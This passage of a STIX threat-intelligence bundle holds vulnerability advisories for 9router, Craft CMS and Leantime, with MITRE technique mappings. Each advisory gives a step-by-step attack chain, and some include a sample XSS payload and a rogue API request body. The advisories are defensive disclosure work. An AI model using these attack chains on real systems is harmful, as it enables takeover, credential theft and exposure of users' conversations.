      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a2750df7-4cc5-55ca-8fab-e727cc2aa1e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--342fa22a-4369-5dec-b9bd-80fa3562334d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a697669-163b-5af9-9627-c9a91923b3fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9497dca6-0058-5bec-92b9-c8d5a25afaa2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "9routers Database Exposure and Takeover via Insecure API",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-55500, has been identified in 9routers versions 0.4.71 and earlier. This flaw resides in the `/api/settings/database` API endpoint, which is intended for database export and import functionalities. Despite being protected by an `ALWAYS_PROTECTED` middleware requiring a valid JWT or CLI token, this protection is deemed insufficient. An attacker, having obtained a valid token (potentially through default credentials like \"123456\" or other means), can exploit this endpoint to perform a full export of the application's database. This export includes highly sensitive information such as plaintext API keys, OAuth tokens, OIDC client secrets, and hashed user credentials. Furthermore, the attacker can import a modified database, enabling a complete wipe and overwrite of the existing database, which can be leveraged to replace administrator password hashes, gain persistent access, and achieve full system takeover. This vulnerability poses a severe risk to the confidentiality, integrity, and availability of affected 9router instances.\n\n## Attack Chain\n\n1.  **Initial Access / Credential Acquisition**: An attacker identifies an accessible 9router instance and obtains an initial valid JWT or CLI token, potentially leveraging default credentials (e.g., '123456') or other initial access methods.\n2.  **Reconnaissance / Sensitive Endpoint Access**: Using the acquired token, the attacker sends an HTTP GET request to the `/api/settings/database` endpoint to understand its functionality and extract current configuration.\n3.  **Data Exfiltration / Credential Dumping**: The vulnerable endpoint responds with a full database export, providing the attacker with highly sensitive information, including plaintext API keys, OAuth tokens, OIDC client secrets, and hashed user credentials.\n4.  **Data Manipulation**: The attacker analyzes the exfiltrated database content, identifies critical entries (such as administrator password hashes), and modifies them to establish their own privileged access.\n5.  **Privilege Escalation / Persistence (Database Import)**: The attacker crafts an HTTP POST request containing the manipulated database payload and sends it to the `/api/settings/database` endpoint, authenticating with their valid token.\n6.  **System Control / Database Overwrite**: The 9router application processes this malicious import request, completely overwriting its operational database with the attacker's controlled data, including new administrator credentials.\n7.  **Impact / Full Takeover**: The attacker can now log in to the 9router instance using their newly set credentials, gaining full administrative control and potentially leveraging the previously stolen API keys for further malicious activities.\n\n## Impact\n\nThe successful exploitation of CVE-2026-55500 leads to severe consequences across multiple domains. Confidentiality is completely breached through the exposure of all stored secrets, including plaintext API keys, OAuth tokens, and OIDC client secrets, which could facilitate lateral movement or access to connected services. Integrity is compromised as attackers can perform a full database replacement with their own controlled data, effectively rewriting all application settings and user credentials. This allows for persistent control and unauthorized modifications. Furthermore, availability can be impacted if an attacker chooses to import an empty or malformed database, leading to a denial of service for the 9router application. This vulnerability enables a complete system takeover.\n\n## Recommendation\n\n*   **Patch Immediately**: Upgrade 9router to a version greater than 0.4.71 to address CVE-2026-55500.\n*   **Implement Strong Authentication**: Ensure that highly sensitive endpoints like `/api/settings/database` require multi-factor authentication or re-authentication with current credentials, not just an existing session.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rule to your SIEM to detect attempts to access the `/api/settings/database` endpoint and investigate any alerts.\n*   **Review Logs**: Audit webserver access logs for `http://localhost:20128/api/settings/database` (or your production URL) for any suspicious GET or POST requests.\n*   **Rotate Credentials**: Immediately rotate all API keys, OAuth tokens, and other secrets if an instance of 9router was running a vulnerable version.\n",
      "published": "2026-07-06T21:43:46Z",
      "labels": [
        "web-exploitation",
        "data-exfiltration",
        "credential-access",
        "persistence",
        "impact"
      ],
      "object_refs": [
        "indicator--950ac136-46af-5c3c-b9b3-e292f5acc80e",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qvfm-67h2-2qfx"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55500"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1585ec92-812e-58f8-8cd9-6fbd5d85dfff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--566fd503-df55-510c-b004-f2d4590adbc5",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--524767d4-1a2d-50bb-8803-c5e643d3e9de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--566fd503-df55-510c-b004-f2d4590adbc5",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--566fd503-df55-510c-b004-f2d4590adbc5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS Authenticated RCE (CVE-2026-55794) via Referer Header Twig Injection",
      "description": "## Overview\n\nA high-severity authenticated Remote Code Execution (RCE) vulnerability, tracked as CVE-2026-55794, has been identified in Craft CMS versions 5.9.0 through 5.9.x. The flaw allows authenticated control panel users who possess permissions to edit entries to execute arbitrary Twig code on the underlying server. This occurs because the platform incorrectly processes user-controlled data within the HTTP `Referer` header as an unsandboxed Twig template during the entry-saving process. Attackers can manipulate this header to inject malicious Twig code, bypassing intended sandboxing mechanisms and achieving full RCE. The vulnerability is considered critical for affected installations as it grants server-level control to a compromised or malicious authenticated user. The issue has been addressed in Craft CMS 5.10.0, and immediate patching is recommended for all affected instances.\n\n## Attack Chain\n\n1.  An attacker gains or possesses authenticated access to the Craft CMS control panel with permissions to edit entries.\n2.  The attacker initiates a process to save an existing entry or create a new one within the Craft CMS control panel.\n3.  Prior to sending the save request, the attacker intercepts or crafts the HTTP request, specifically manipulating the `Referer` header.\n4.  The attacker injects malicious, unsandboxed Twig code into the `Referer` header's value, designed to execute arbitrary commands.\n5.  Craft CMS processes the `Referer` header value as part of generating a signed redirect URL, inadvertently compiling the attacker-controlled string as an unsandboxed Twig template using `renderObjectTemplate()`.\n6.  The injected malicious Twig code is executed by the server-side template engine, leading to arbitrary command execution on the host.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55794 grants an authenticated attacker full Remote Code Execution (RCE) on the server hosting Craft CMS. This can lead to complete compromise of the web server and its associated data. Impact includes, but is not limited to, data exfiltration, website defacement, installation of backdoors, further lateral movement within the network, and complete system takeover. Organizations in any sector using affected Craft CMS versions are at risk of significant operational disruption and data breaches if this vulnerability is exploited.\n\n## Recommendation\n\n*   Immediately update Craft CMS to version 5.10.0 or higher to patch CVE-2026-55794.\n*   Deploy the Sigma rule below to your SIEM to detect attempts at Twig injection via the `Referer` header.\n*   Ensure web server logs (category `webserver`) are configured to capture full HTTP request headers, especially the `Referer` header, for effective detection.\n",
      "published": "2026-07-06T21:38:43Z",
      "labels": [
        "rce",
        "web-application",
        "craft-cms",
        "cve",
        "authenticated-rce"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f74w-488g-8x5r"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/craftcms/cms/pull/18680"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4401a5a8-abc9-5017-95f8-465cf780f092",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/craftcms/cms/issues/new",
      "pattern": "[url:value = 'https://github.com/craftcms/cms/issues/new']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:34:06Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1d5aed76-ca32-5514-8db2-c7c6344b9ed2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f630335-1151-5475-8ba8-818b2a8c917f",
      "target_ref": "indicator--4401a5a8-abc9-5017-95f8-465cf780f092"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a3d5534-8163-5585-a891-c94d91be6c92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6f630335-1151-5475-8ba8-818b2a8c917f",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6f630335-1151-5475-8ba8-818b2a8c917f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS: DOM XSS via GitHub issue title in CraftSupport widget",
      "description": "## Overview\n\nA DOM Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2026-55790, has been identified in Craft CMS versions prior to 5.9.22 and 4.17.15, impacting the CraftSupport widget. This flaw allows an attacker to inject and execute arbitrary JavaScript code within a Craft CMS administrator's browser session. The attack vector involves an attacker, requiring only a GitHub account and no prior access to the Craft CMS control panel, planting a JavaScript payload within the title of a GitHub issue on the `craftcms/cms` repository. When a Craft CMS administrator accesses the CraftSupport widget's \"Give feedback\" screen and searches for a term that returns the attacker-controlled issue, the unsanitized issue title is rendered, causing the malicious payload to execute. This vulnerability is critical as it grants the attacker the ability to perform actions within the administrator's authenticated session.\n\n## Attack Chain\n\n1.  **Attacker creates malicious GitHub issue**: An attacker, using a standard GitHub account, navigates to `https://github.com/craftcms/cms/issues/new`.\n2.  **Payload injection**: The attacker crafts a new issue title that combines a plausible search term with a JavaScript payload, e.g., `\u003cimg src=x onerror=alert(document.domain)\u003e cannot upload files`.\n3.  **Issue submission**: The attacker submits the crafted GitHub issue to the `craftcms/cms` repository.\n4.  **Victim accesses Craft CMS dashboard**: A Craft CMS administrator logs into their control panel dashboard.\n5.  **Victim opens CraftSupport widget**: The administrator opens the CraftSupport widget, typically located on the dashboard.\n6.  **Victim triggers search**: The administrator clicks \"Give feedback\" within the widget and types a search term (e.g., `cannot upload files`) into the search box that matches the attacker's poisoned GitHub issue title.\n7.  **Client-side rendering and XSS execution**: The CraftSupport widget's JavaScript (`CraftSupportWidget.js`) fetches the GitHub issue data. The `FeedbackScreen.getSearchResultText` function returns the issue title verbatim, which is then rendered via jQuery's `html:` option, leading to immediate execution of the injected JavaScript payload (e.g., `alert(document.domain)`) in the admin's browser session.\n8.  **Post-XSS actions**: The executed JavaScript can access the administrator's session context, including CSRF tokens (`Craft.csrfTokenName`, `Craft.csrfTokenValue`), allowing the attacker to send same-origin requests and perform unauthorized actions within the Craft CMS control panel.\n\n## Impact\n\nSuccessful exploitation of this DOM XSS vulnerability results in arbitrary JavaScript execution within the targeted Craft CMS administrator's authenticated session. This grants the attacker the ability to perform any action the administrator can, including but not limited to, modifying settings, installing malicious plugins, exfiltrating data, or creating new administrative users. The attacker can leverage the victim's session and automatically obtained CSRF tokens to bypass protections and send authenticated requests. While the attacker relies on the administrator actively using a specific search function, the potential for full administrative compromise poses a significant risk to the integrity and confidentiality of the Craft CMS instance.\n\n## Recommendation\n\n*   **Patch CVE-2026-55790 immediately**: Upgrade affected Craft CMS instances to version 5.9.22 or later for Craft CMS 5.x, or 4.17.15 or later for Craft CMS 4.x.\n*   **Educate administrators**: Advise Craft CMS administrators to exercise caution when interacting with embedded widgets that fetch external content, especially if search terms are user-controlled and results are displayed without obvious sanitization.\n",
      "published": "2026-07-06T21:34:06Z",
      "labels": [
        "xss",
        "web-vulnerability",
        "craft-cms",
        "application-layer"
      ],
      "object_refs": [
        "indicator--4401a5a8-abc9-5017-95f8-465cf780f092",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-24x4-j6x9-rfw5"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/craftcms/cms/commit/6bbb66038a268552180ca5c8eed9f46ea25a4417"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c65c45e3-3a2e-5b7f-8b3c-8cfa64da9254",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b22c5da1-364a-59c5-a256-2a7c48fc8cbf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab150348-763a-59c8-b2c6-7c87d3d8200f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4794d298-3a59-5a28-88eb-6c18418ec64a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de080939-5c6c-557d-baea-5890f2fefcaa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c1ab442e-c9ca-5d52-a6f2-245128c178b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical Unauthenticated API Vulnerabilities in 9Router Leading to Data Leak and RCE Risk",
      "description": "## Overview\n\nCritical API security vulnerabilities have been identified in 9Router's Next.js dashboard, impacting versions up to 0.4.41. These flaws stem from a lack of authentication middleware on several API endpoints, making them fully accessible to unauthenticated attackers. Specifically, the `/api/providers` endpoints permit complete Create, Read, Update, and Delete (CRUD) operations on all provider connections, enabling an attacker to manipulate or destroy configurations, redirect traffic, or capture credentials. Additionally, the `/api/usage/stats` endpoint exposes full plaintext API keys, while `/api/usage/request-logs` and `/api/usage/request-details` disclose all users' request history and sensitive conversation contents, including system prompts and user messages. This combination of vulnerabilities allows for widespread data exfiltration, credential compromise, and potential denial of service or traffic hijacking.\n\n## Attack Chain\n\n1.  An unauthenticated attacker sends an HTTP GET request to `https://\u003chost\u003e/api/providers` to list all configured provider connections, obtaining partial credentials and account IDs.\n2.  The attacker sends an HTTP POST request to `https://\u003chost\u003e/api/providers` with a malicious payload to create a new, attacker-controlled provider connection (e.g., `{\"provider\":\"openai\",\"authType\":\"apikey\",\"name\":\"rogue\",\"apiKey\":\"sk-attacker-controlled\"}`).\n3.  The attacker sends an HTTP PUT request to `https://\u003chost\u003e/api/providers/\u003cexisting-uuid\u003e` to modify an existing provider's configuration, potentially replacing legitimate API keys with their own to redirect traffic or exfiltrate data.\n4.  The attacker sends an HTTP DELETE request to `https://\u003chost\u003e/api/providers/\u003cexisting-uuid\u003e` to delete critical provider connections, leading to denial of service for legitimate users.\n5.  The attacker sends an HTTP GET request to `https://\u003chost\u003e/api/usage/stats` to retrieve a list of all plaintext API keys, per-account usage data, and cost information.\n6.  The attacker sends an HTTP GET request to `https://\u003chost\u003e/api/usage/request-logs` to obtain paginated request logs containing timestamps, models, providers, and user emails.\n7.  The attacker retrieves individual conversation details by sending an HTTP GET request to `https://\u003chost\u003e/api/usage/request-details/\u003crequest-uuid\u003e`, exposing full conversation turns, including system prompts and sensitive user messages.\n8.  The attacker leverages the stolen API keys and conversation data for further malicious activities, such as unauthorized access to AI provider accounts or social engineering.\n\n## Impact\n\nThe identified vulnerabilities have critical consequences. An attacker can add malicious providers to intercept all prompts and responses, modify existing providers to hijack legitimate traffic, or delete all providers to cause a complete denial of service. The compromise extends to a full API key leak via `/api/usage/stats`, enabling unauthorized use of connected AI provider accounts. Most critically, the `/api/usage/request-details` endpoint exposes complete conversation histories, including highly sensitive system prompts, user messages, and assistant responses, leading to severe privacy breaches and potential exfiltration of proprietary or confidential information processed by AI models.\n\n## Recommendation\n\n*   Prioritize patching 9Router instances to a version greater than 0.4.41 immediately.\n*   Deploy the provided Sigma rules to your SIEM solution and tune them for your environment to detect attempts to exploit these vulnerabilities against `/api/providers`, `/api/usage/stats`, and `/api/usage/request-details`.\n*   Review web server access logs for any suspicious unauthenticated POST, PUT, or DELETE requests to `/api/providers` endpoints as well as GET requests to `/api/usage/stats` or `/api/usage/request-details` originating from unusual IP addresses.\n*   Implement strong authentication and authorization controls for all sensitive API endpoints in your environment, especially those related to configuration and data access.\n",
      "published": "2026-07-06T21:30:03Z",
      "labels": [
        "web-vulnerability",
        "api-security",
        "data-exfiltration",
        "credential-access",
        "denial-of-service",
        "unauthenticated-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vjc7-jrh9-9j86"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--db6ae8c8-6b33-58d9-bc76-73b86cfef23b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--20beaebb-75fa-5db2-881c-b5e27e1b919e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3e01d885-c596-5859-bd6e-781dcd115258",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--20beaebb-75fa-5db2-881c-b5e27e1b919e",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6fe156d9-a913-5db9-9900-794e669197e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--20beaebb-75fa-5db2-881c-b5e27e1b919e",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--20beaebb-75fa-5db2-881c-b5e27e1b919e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-59713: Leantime OIDC Login CSRF leading to Session Fixation",
      "description": "## Overview\n\nA significant security vulnerability, CVE-2026-59713, has been disclosed in Leantime, an open-source project management system. This high-severity flaw (CVSS v3.1 Base Score: 8.1) exists within the OpenID Connect (OIDC) login mechanism, specifically in the `verifyState()` method. The method is designed to validate state parameters to prevent Cross-Site Request Forgery (CSRF) attacks but unconditionally returns `true`, effectively bypassing this crucial security check. Attackers can exploit this by pre-authenticating to Leantime via OIDC and then crafting a malicious callback URL containing their own valid authorization code. By tricking a victim into clicking this URL, the victim is inadvertently logged into the attacker's Leantime session, leading to session fixation. This can enable the attacker to manipulate the victim's perception and actions within the application, potentially leading to unauthorized data exposure or malicious activity conducted under the guise of the victim's interaction.\n\n## Attack Chain\n\n1. An attacker first registers an account and authenticates to Leantime through their configured OIDC provider.\n2. The attacker then captures the session identifier or authorization code generated during their legitimate OIDC authentication flow.\n3. The attacker crafts a malicious URL for the Leantime application's OIDC callback endpoint, embedding the captured attacker-controlled authorization code.\n4. The attacker delivers this crafted malicious URL to a target victim, typically via social engineering methods such as a phishing email or message.\n5. The victim is enticed to click the malicious link, which directs their browser to the vulnerable Leantime OIDC callback endpoint.\n6. Due to the flaw in the `verifyState()` method, Leantime processes the attacker's authorization code without validating the OIDC `state` parameter against the user's session.\n7. The Leantime application then logs the victim's browser session into the attacker's pre-established account, effectively performing session fixation.\n8. The victim, believing they are logged into their own account, may perform actions that are actually attributed to the attacker's account, potentially compromising data or application integrity.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-59713 results in session fixation, where a victim is logged into an attacker's Leantime account without their explicit knowledge. While this does not directly grant the attacker access to the victim's *personal* Leantime account, it allows the attacker to trick the victim into performing actions within the application *as the attacker*. This poses a significant risk to data integrity and user trust. For instance, a victim might inadvertently modify or delete project data, publish sensitive information, or interact with other users, all under the attacker's identity. This can lead to confusion, data corruption, and potentially reputational damage for organizations using Leantime, as well as enabling sophisticated social engineering attacks where the victim is coerced into performing actions that benefit the attacker.\n\n## Recommendation\n\n*   **Patch CVE-2026-59713** on all Leantime instances immediately, as detailed by the vendor to address the `verifyState()` vulnerability.\n*   Educate users on the risks of phishing and urge caution when clicking on suspicious links, especially those asking for login or appearing to redirect after authentication.\n",
